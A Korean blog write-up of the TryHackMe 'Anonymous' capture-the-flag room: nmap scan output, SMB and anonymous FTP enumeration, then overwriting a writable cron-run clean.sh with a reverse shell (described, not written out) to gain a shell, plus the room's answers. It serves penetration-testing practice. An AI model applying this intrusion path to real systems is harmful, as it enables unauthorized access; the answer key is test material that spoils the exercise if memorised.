TASK 1 PWN
1. ANSWER : 얼마나 많은 포트가 있나요?
nmap -sV -sC -A [머신 IP]
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.21.35.246
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 2 111 113 4096 Jun 04 2020 scripts [NSE: writeable]
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8b:ca:21:62:1c:2b:23:fa:6b:c6:1f:a8:13:fe:1c:68 (RSA)
| 256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA)
|_ 256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
2. ANSWER : 21/tcp 포트에 어떤 서비스가 운영중인가요?
ftp
3. 139 , 445 포트에 어떤 서비스가 운영중인가요?
samba
4. user smb 컴뷰터에선 이름을 뭐라고 부르나요
smbclient -L [머신IP]
get corgo2.jpg
get puppos.jpeg
귀여운 강아지들이 나온다..
이게 뭘 의미하는지 잘 모르것다..
다음 단계로 넘어가보자
5. ANSWER : user.txt
name : anonymous
password : root
ls
cd scripts
ls
get clean.sh
get removed_files.log
get to_do.txt
현재 clean.sh 이부분이 /var/ftp/scripts/removed_files.log 로그를 남겨논걸로 보아..
흠 ... 뭘하면 좋을까...
clean.sh 를 리버스쉘로 바꾸면 해결될거같다.
tcp/openvpn ip로 설정/LPORT/
cd scripts
ls
put clean.sh
10~20 초 기다리면 shell 획득!
6. ANSWER : root.txt
난이도 : 2/10
한줄평 : we are anonymous
'TryHackMe | CTF' 카테고리의 다른 글
| TryHackMe | Bolt - 웹해킹 CTF (0) | 2024.09.29 |
|---|---|
| TryHackMe | Startup - 모의해킹 CTF (0) | 2024.09.22 |
| Tryhackme kenobi | OSCP [모의해킹 CTF] (1) | 2024.09.14 |
| [TryHackMe] | Vulnversity - OSCP 모의해킹 CTF (0) | 2024.09.14 |
| [TryHackMe] | Cyborg write-up [모의해킹] [CTF] (1) | 2024.09.08 |